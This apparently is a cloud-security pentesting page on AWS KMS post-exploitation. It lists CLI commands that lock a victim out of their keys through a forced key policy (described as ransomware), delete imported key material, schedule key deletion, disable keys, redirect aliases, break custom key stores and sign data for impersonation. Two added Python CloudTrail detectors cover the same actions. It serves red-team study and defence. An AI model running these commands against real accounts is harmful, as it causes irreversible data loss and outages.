AWS - KMS Post Exploitation


KMS

For more information check:

AWS - KMS Enum

Encrypt/Decrypt information

fileb:// and file:// are URI schemes used in AWS CLI commands to specify the path of local files:

  • fileb://: Reads the file in binary mode, typically used for non-text files.
  • file://: Reads the file in text mode, typically used for plain text files, scripts, or JSON without special encoding requirements.

tip

Note that if you want to decrypt some data inside a file, the file must contain the binary data, not base64 encoded data (fileb://).

  • Using a symmetric key
```bash
# Encrypt data
aws kms encrypt \
--key-id f0d3d719-b054-49ec-b515-4095b4777049 \
--plaintext fileb:///tmp/hello.txt \
--output text \
--query CiphertextBlob | base64 \
--decode > ExampleEncryptedFile

# Decrypt data
aws kms decrypt \
--ciphertext-blob fileb://ExampleEncryptedFile \
--key-id f0d3d719-b054-49ec-b515-4095b4777049 \
--output text \
--query Plaintext | base64 \
--decode
```
  • Using an asymmetric key:
```bash
# Encrypt data
aws kms encrypt \
--key-id d6fecf9d-7aeb-4cd4-bdd3-9044f3f6035a \
--encryption-algorithm RSAES_OAEP_SHA_256 \
--plaintext fileb:///tmp/hello.txt \
--output text \
--query CiphertextBlob | base64 \
--decode > ExampleEncryptedFile

# Decrypt data
aws kms decrypt \
--ciphertext-blob fileb://ExampleEncryptedFile \
--encryption-algorithm RSAES_OAEP_SHA_256 \
--key-id d6fecf9d-7aeb-4cd4-bdd3-9044f3f6035a \
--output text \
--query Plaintext | base64 \
--decode
```

KMS Ransomware

An attacker with privileged access to KMS can modify the key policies of the KMS keys and grant their own account access over them, removing the access granted to the legitimate account.

Then, the users of the legitimate account can no longer access the information of any service encrypted with those keys, creating a simple but effective ransomware over the account.

warning

Note that AWS managed keys aren't affected by this attack; only Customer managed keys are.

Also note the need to use the param --bypass-policy-lockout-safety-check (the absence of this option in the web console makes this attack only possible from the CLI).

```bash
# Force policy change
aws kms put-key-policy --key-id mrk-c10357313a644d69b4b28b88523ef20c \
--policy-name default \
--policy file:///tmp/policy.yaml \
--bypass-policy-lockout-safety-check
```

```json
{
  "Id": "key-consolepolicy-3",
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "Enable IAM User Permissions",
      "Effect": "Allow",
      "Principal": {
        "AWS": "arn:aws:iam::<your_own_account>:root"
      },
      "Action": "kms:*",
      "Resource": "*"
    }
  ]
}
```

caution

Note that if you change that policy and only give access to an external account, and then from this external account you try to set a new policy to give the access back to the original account, you won't be able to, because the PutKeyPolicy action cannot be performed from a cross account.
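A defender-side complement to the lockout described above: an added example, not part of the original page, that reviews a CloudTrail PutKeyPolicy record and the policy it installs for principals that all belong to a foreign account, plus the bypass flag. The record shape follows CloudTrail's requestParameters; the sample record, policy and account ids are constructed.

```python
"""Added defender-side check for the lockout pattern above: a PutKeyPolicy whose new policy
grants kms:* only to a foreign account. Sample policy and record are constructed placeholders."""
import json
import re

ARN_ACCOUNT = re.compile(r"^arn:aws:iam::(\d{12}):")

def statement_accounts(statement):
    # 12-digit account ids named in the statement's AWS principals ('*' passes through)
    principal = statement.get("Principal", {})
    aws = principal if isinstance(principal, str) else principal.get("AWS", [])
    aws = [aws] if isinstance(aws, str) else aws
    accounts = set()
    for p in aws:
        m = ARN_ACCOUNT.match(p)
        accounts.add(m.group(1) if m else p)  # bare account id or '*' kept as-is
    return accounts

def key_policy_findings(policy, key_account):
    # Flag kms:* grants to other accounts and the absence of any Allow for the key's own account.
    findings, allowed = [], set()
    for st in policy.get("Statement", []):
        if st.get("Effect") != "Allow":
            continue
        accounts = statement_accounts(st)
        allowed |= accounts
        actions = st.get("Action", [])
        actions = [actions] if isinstance(actions, str) else actions
        foreign = sorted(accounts - {key_account, "*"})
        if foreign and any(a in ("kms:*", "*") for a in actions):
            findings.append(f"kms:* granted to foreign account(s) {foreign}")
    if not allowed & {key_account, "*"}:
        findings.append(f"key owner {key_account} has no Allow statement: lockout")
    return findings

def review_put_key_policy(event):
    # CloudTrail PutKeyPolicy record: the key lives in recipientAccountId; policy is a JSON string.
    params = event["requestParameters"]
    findings = key_policy_findings(json.loads(params["policy"]), event["recipientAccountId"])
    if params.get("bypassPolicyLockoutSafetyCheck"):
        findings.append("bypassPolicyLockoutSafetyCheck=true (CLI/API only)")
    return findings

# Constructed sample: victim account 123456789012, attacker-controlled account 111111111111.
LOCKOUT_POLICY = {"Version": "2012-10-17", "Statement": [{"Effect": "Allow", "Action": "kms:*",
    "Principal": {"AWS": "arn:aws:iam::111111111111:root"}, "Resource": "*"}]}
SAMPLE_EVENT = {"eventName": "PutKeyPolicy", "recipientAccountId": "123456789012", "requestParameters": {
    "policyName": "default", "policy": json.dumps(LOCKOUT_POLICY), "bypassPolicyLockoutSafetyCheck": True}}

print(*review_put_key_policy(SAMPLE_EVENT), sep="\n")
```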

Generic KMS Ransomware

There is another way to perform a generic KMS Ransomware, which would involve the following steps:

  • Create a new key with key material imported by the attacker
  • Re-encrypt older data of the victim that was encrypted with the previous version using the new one.
  • Delete the KMS key
  • Now only the attacker, who has the original key material, would be able to decrypt the encrypted data

Delete Keys via kms:DeleteImportedKeyMaterial

With the kms:DeleteImportedKeyMaterial permission, a principal can delete the imported key material from CMKs with Origin=EXTERNAL (CMKs whose key material was imported), making them unable to decrypt data. This action is destructive and cannot be undone unless valid material is re-imported, allowing an attacker to cause ransomware-like data loss by making encrypted information completely inaccessible.

```bash
aws kms delete-imported-key-material --key-id <Key_ID>
```

Destroying keys

By destroying keys, it is possible to cause a DoS.

```bash
# Schedule the destruction of a key (min wait time is 7 days)
aws kms schedule-key-deletion \
--key-id arn:aws:kms:us-west-2:123456789012:key/1234abcd-12ab-34cd-56ef-1234567890ab \
--pending-window-in-days 7
```

caution

Be aware that AWS now prevents the previous actions from being performed from a cross account:

Modify or delete Alias

This attack deletes or redirects AWS KMS aliases, breaking key resolution and causing immediate failure of any service that depends on those aliases, resulting in denial-of-service. With permissions such as kms:DeleteAlias or kms:UpdateAlias an attacker can remove or redirect aliases and affect cryptographic operations (e.g., encrypt, describe). Any service that references the alias instead of the key ID can fail until the alias is restored or correctly remapped.

```bash
# Delete Alias
aws kms delete-alias --alias-name alias/<key_alias>

# Update Alias
aws kms update-alias \
--alias-name alias/<key_alias> \
--target-key-id <new_target_key>
```

Cancel Key Deletion

With permissions such as kms:CancelKeyDeletion and kms:EnableKey, a principal can cancel the scheduled deletion of an AWS KMS customer master key and subsequently re-enable it. Doing so restores the key (initially in the Disabled state) and restores its ability to decrypt previously protected data, thereby enabling exfiltration.

```bash
# First cancel the deletion
aws kms cancel-key-deletion \
--key-id <Key_ID>

# Second enable the key
aws kms enable-key \
--key-id <Key_ID>
```

Disable Key

With the kms:DisableKey permission, a principal can disable an AWS KMS customer master key (CMK), preventing it from being used for encryption or decryption. This breaks availability for any service that depends on that CMK and can cause immediate disruption or denial-of-service until the key is re-enabled.

```bash
aws kms disable-key \
--key-id <key_id>
```

Derive Shared Secret

With the kms:DeriveSharedSecret permission, a principal can use a KMS-held private key together with a user-supplied public key to compute an ECDH shared secret.

```bash
aws kms derive-shared-secret \
--key-id <key_id> \
--public-key fileb:///<route_to_public_key> \
--key-agreement-algorithm <algorithm>
```

Impersonation via kms:Sign

With the kms:Sign permission, a principal can use a KMS-stored CMK to cryptographically sign data without exposing the private key, producing valid signatures that could enable impersonation or allow malicious actions.

```bash
aws kms sign \
--key-id <key-id> \
--message fileb://<ruta-al-archivo> \
--signing-algorithm <algoritmo> \
--message-type RAW
```

DoS with Custom Key Stores

With permissions such as kms:DeleteCustomKeyStore, kms:DisconnectCustomKeyStore, or kms:UpdateCustomKeyStore, a principal can modify, disconnect, or delete an AWS KMS Custom Key Store (CKS), rendering its master keys non-functional. This breaks encryption, decryption, and signing operations for any service that depends on those keys and can cause an immediate denial-of-service. It is therefore important to restrict and monitor those permissions.

```bash
aws kms delete-custom-key-store --custom-key-store-id <CUSTOM_KEY_STORE_ID>

aws kms disconnect-custom-key-store --custom-key-store-id <CUSTOM_KEY_STORE_ID>

aws kms update-custom-key-store --custom-key-store-id <CUSTOM_KEY_STORE_ID> --new-custom-key-store-name <NEW_NAME> --key-store-password <NEW_PASSWORD>
```
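To round off the destructive actions covered in the sections above (scheduling key deletion, deleting imported material, disabling keys, alias and custom key store tampering, cancelling a deletion and re-enabling), here is an added detection example, not from the original page, that scores CloudTrail records by KMS event name, requested pending window and cross-account caller. The sample records, key ids and account ids are constructed.

```python
"""Added defender-side detection of the destructive KMS calls described on this page, run
over constructed CloudTrail records (key ids and account ids are placeholders)."""

# eventName -> (impact, severity)
WATCHED = {
    "ScheduleKeyDeletion": ("key destruction / DoS", "high"),
    "DeleteImportedKeyMaterial": ("irreversible loss of imported key material", "critical"),
    "DisableKey": ("key unusable / DoS", "high"),
    "DeleteAlias": ("alias resolution broken / DoS", "medium"),
    "UpdateAlias": ("alias redirected to another key", "medium"),
    "DeleteCustomKeyStore": ("custom key store removed", "critical"),
    "DisconnectCustomKeyStore": ("custom key store disconnected", "high"),
    "UpdateCustomKeyStore": ("custom key store credentials/name changed", "medium"),
    "CancelKeyDeletion": ("key scheduled for deletion revived", "medium"),
    "EnableKey": ("disabled key re-enabled", "medium"),
}

def kms_findings(record):
    # Findings for one CloudTrail record; empty list when the call is not of interest.
    name = record.get("eventName")
    if record.get("eventSource") != "kms.amazonaws.com" or name not in WATCHED:
        return []
    impact, severity = WATCHED[name]
    params = record.get("requestParameters") or {}
    target = params.get("keyId") or params.get("aliasName") or params.get("customKeyStoreId", "?")
    findings = [f"{severity}: {name} on {target}: {impact}"]
    # 7 days is the shortest window KMS allows; asking for it signals haste.
    if name == "ScheduleKeyDeletion" and params.get("pendingWindowInDays", 30) <= 7:
        findings.append("high: shortest possible deletion window requested")
    # Caller from a different account than the one that owns the key or alias.
    actor = record.get("userIdentity", {}).get("accountId")
    if actor and actor != record.get("recipientAccountId"):
        findings.append(f"high: cross-account caller {actor}")
    return findings

def scan(records):
    return [f for r in records for f in kms_findings(r)]

# Constructed sample: a hasty deletion by the key owner and a cross-account alias removal.
SAMPLE_RECORDS = [
    {"eventSource": "kms.amazonaws.com", "eventName": "ScheduleKeyDeletion",
     "recipientAccountId": "123456789012", "userIdentity": {"accountId": "123456789012"},
     "requestParameters": {"keyId": "1234abcd-12ab-34cd-56ef-1234567890ab", "pendingWindowInDays": 7}},
    {"eventSource": "kms.amazonaws.com", "eventName": "DeleteAlias", "recipientAccountId": "123456789012",
     "userIdentity": {"accountId": "111111111111"}, "requestParameters": {"aliasName": "alias/app-data"}},
]

if __name__ == "__main__":
    for line in scan(SAMPLE_RECORDS):
        print(line)
```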
